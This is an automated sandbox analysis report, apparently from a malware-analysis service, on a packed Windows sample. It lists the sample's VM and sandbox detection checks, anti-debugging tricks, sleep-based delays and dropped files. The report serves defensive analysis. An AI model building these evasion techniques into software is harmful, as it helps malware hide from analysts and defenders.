              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Check if machine is in data center or colocation facility
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Uses ping.exe to sleep
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5032Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6030Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7329
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2229
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1118
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3440
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2236
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2568
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4550
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 555
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1081
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2227
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3064
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 638
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_hashlib.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dllJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\unicodedata.pydJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5316Thread sleep count: 5032 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6924Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024Thread sleep count: 6030 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6900Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1076Thread sleep count: 350 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5740Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1744Thread sleep count: 7329 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1744Thread sleep count: 2229 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep count: 1118 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6188Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep count: 3440 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5820Thread sleep time: -11990383647911201s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep count: 2236 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5640Thread sleep count: 2568 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep count: 4550 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2720Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 555 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6624Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep count: 1081 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep count: 2227 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5804Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep count: 3064 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep count: 638 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\SysWOW64\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\SysWOW64\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA446EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,109_2_00007FF6FAA446EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA3E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,109_2_00007FF6FAA3E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA888E0 FindFirstFileExA,109_2_00007FF6FAA888E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: getmac.exe, 00000057.00000002.2676819585.0000000003477000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2674066441.0000000003474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: getmac.exe, 00000057.00000003.2674066441.000000000349E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2675081406.000000000349E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"K
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 00000057.00000003.2674066441.0000000003492000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000002.2677507170.0000000003492000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2675211737.0000000003492000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__4+<
              Source: getmac.exe, 00000057.00000002.2676819585.0000000003477000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2674066441.0000000003474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484207815.0000000004E0A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484268459.0000000004E67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484460219.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: KpHYfxnJs6.exe, 00000004.00000003.2744344926.000000000767A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.0000000007678000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2742827988.0000000007D4A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007672000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684446384.0000000007534000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2647658654.0000000007679000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2678531952.0000000007531000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: getmac.exe, 00000057.00000002.2676819585.0000000003477000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000003.2674066441.0000000003474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW`8<
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: getmac.exe, 00000057.00000003.2674898339.00000000034B4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000002.2677991760.00000000034B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer`
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: getmac.exe, 00000057.00000003.2674898339.00000000034B4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000057.00000002.2677991760.00000000034B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
              Source: KpHYfxnJs6.exe, 00000000.00000003.1672563965.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
              Source: KpHYfxnJs6.exe, 00000000.00000003.1672642166.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeOpen window title or class name: procmon_window_class
